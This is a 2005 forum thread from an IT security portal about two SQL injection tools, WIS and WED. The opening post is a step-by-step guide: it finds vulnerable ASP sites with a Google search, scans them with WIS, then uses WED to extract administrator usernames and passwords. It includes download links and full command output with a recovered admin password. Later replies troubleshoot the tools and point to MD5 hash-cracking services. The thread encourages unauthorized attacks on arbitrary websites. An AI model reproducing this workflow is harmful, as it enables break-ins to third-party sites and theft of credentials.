Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
April 8, 2020
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 598
Members: 0
Total: 598
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Sql injection tools Wed&Wis Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
Sql injection tools Wed&Wis
PostPosted: Thu Jan 13, 2005 4:02 pm Reply with quote
qr4t
Regular user
Regular user
 
Joined: Nov 21, 2004
Posts: 11
Location: Estonia




I found 2 tools to automate the sql injection process. I tested them and got some users/passwds Smile My tests also showed that it missed some sql injections Sad
Here's how to use them:
First i searched with google some asp sites like this "allinurl:/login.asp". Next i used Wis (Web Injection Scanner - searches web for sql injection) and if it found hole then i started Wed (Web Entry Detector) to exploit the injection. Tools can be downloaded from here:
http://www.hot.ee/qr4t/wis.rar
http://www.hot.ee/qr4t/wed.rar
It goes like this:

Code:

C:\>wis http://www.someaspsite.com/

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com


Scanning http://www.someaspsite.com/, Page: Unlimited
Patient, Please....

(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204

Injection Page Final Result:
============================
/shownews.asp?newsid=204

C:\>


To detect access pages, put a "/A" to the end of command:

Code:

C:\>wis http://www.someaspsite.com/ /A

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please....

(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp

Access Page Final Result:
============================
/gansu2/login.asp (200 OK)

Scan Finished

C:\>


When you successfully find Sql Injection with Wis then next step is to use Wed and the vulnerable url:

Code:

C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com, security@vip.sina.com

#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened

#### Phrase 1: Process Argv ####
Host:www.someaspsite.com
Page:/shownews.asp?newsid=1544

#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.

#### Phrase 3: Get Cookies ####
Tag: 2017
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/

#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"

#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"

#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13

#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9

#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####

name is: administrator
pwd is: admin@bvn

C:\>


Happy Injecting Razz
View user's profile Send private message MSN Messenger
a
PostPosted: Thu Jan 13, 2005 10:28 pm Reply with quote
SteX
Advanced user
Advanced user
 
Joined: May 18, 2004
Posts: 181
Location: Serbia




nice found

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Fri Jan 14, 2005 7:08 pm Reply with quote
any2000
Active user
Active user
 
Joined: Dec 02, 2004
Posts: 26




very good toolz thanks qr4t Very Happy
View user's profile Send private message
This Tools is China Hacker rongxiao Public
PostPosted: Sat Jan 15, 2005 3:42 pm Reply with quote
firefox
Beginner
Beginner
 
Joined: Jan 15, 2005
Posts: 2




^_^

is very good
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Sat Jan 15, 2005 5:29 pm Reply with quote
Oguz
Regular user
Regular user
 
Joined: Nov 29, 2004
Posts: 7




super...
thanks...

_________________
{ [ NCT ] }
View user's profile Send private message
PostPosted: Tue Jan 18, 2005 5:35 am Reply with quote
proview
Beginner
Beginner
 
Joined: Jan 18, 2005
Posts: 1




Hi, the first of all, sorry for my very very very bad english Embarassed
Congratulations for the wis & wed programs. Very Happy
I have a problem. The first step with the wis, it's ok!, an example i got this:
Page Found: /admin/login.asp (401 AuthReq)
Page Found: /admin/default.asp (401 AuthReq)
Page Found: /admin/index.asp (401 AuthReq)
Page Found: /admin/manage.asp (401 AuthReq)

Access Page Final Result:
============================
/admin/manage.asp (401 AuthReq)
/admin/index.asp (401 AuthReq)
/admin/default.asp (401 AuthReq)
/admin/login.asp (401 AuthReq)

Now, I not that to do with these results, in step 2 with the wed program Crying or Very sad
Anyone can help me please?
Sorry one more time for my bad english Embarassed
View user's profile Send private message
What about using proxy with the wis usage ?
PostPosted: Tue Jan 18, 2005 3:34 pm Reply with quote
ToXiC
Moderator
Moderator
 
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus




is there a -p or anything in the usage to use proxy .. ?
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Tue Jan 18, 2005 6:09 pm Reply with quote
ToXiC
Moderator
Moderator
 
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus




HEllo again ..i have run this expl from another pc and i have managed to get to the point where it is using brute force

Code:
#### Phrase 7: Starting Get Password Field ####
Tag: 332
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 5

#### Phrase 9: Starting Brute Field "administrators" and "pwd" (Access Mode) ###
#
Brute Force "administrators":  ktu' "pwd": VB?<Y "!ln=Zry(),.v&kHJaEIKb(R$),Q<S>
C:\Documents and Settings\xxxx\Desktop\wed>


and while it is working the program crashes...any ideas y?
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Fri Mar 18, 2005 9:53 pm Reply with quote
kunfuzed
Beginner
Beginner
 
Joined: Mar 18, 2005
Posts: 1




#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk







I have gotten the name and password but is it hashed? I cant log in with this info!
View user's profile Send private message
PostPosted: Tue Mar 29, 2005 8:46 am Reply with quote
safer
Regular user
Regular user
 
Joined: Jun 20, 2004
Posts: 5




it come from china!
View user's profile Send private message
admin.txt
PostPosted: Wed Mar 30, 2005 10:32 am Reply with quote
matrix2005
Beginner
Beginner
 
Joined: Feb 12, 2005
Posts: 3




whay i got this error admin.txt not fond ı have admin.txt in same directory can some one help me.. Question
View user's profile Send private message
PostPosted: Tue Jul 05, 2005 10:00 pm Reply with quote
petitmaitreblanc
Regular user
Regular user
 
Joined: Jul 05, 2005
Posts: 18




wis seemed don't work for me , but wed , no problem .

understand.. when I launch wis , with or without param , the program stop , without checking anything.. no error message , nothing , just stop .
View user's profile Send private message
hashed password
PostPosted: Thu Jul 07, 2005 4:31 pm Reply with quote
neo_hack
Regular user
Regular user
 
Joined: Jul 04, 2005
Posts: 6




kunfuzed wrote:
#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk







I have gotten the name and password but is it hashed? I cant log in with this info!


Well if the password is hashed with md5 algorthm try using this:
http://www.securitylab.ru/tools/22140.html
If it is sha1 or not salted md5 try http://passcracking.com/
View user's profile Send private message
PostPosted: Thu Jul 07, 2005 6:10 pm Reply with quote
diaga
Regular user
Regular user
 
Joined: Jun 27, 2005
Posts: 22




downloaded it, how do i use it?
View user's profile Send private message
md5
PostPosted: Thu Jul 14, 2005 12:37 pm Reply with quote
neo_hack
Regular user
Regular user
 
Joined: Jul 04, 2005
Posts: 6




md5crack xxx
xxx - type your hash here
View user's profile Send private message
Sql injection tools Wed&Wis
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.069 Seconds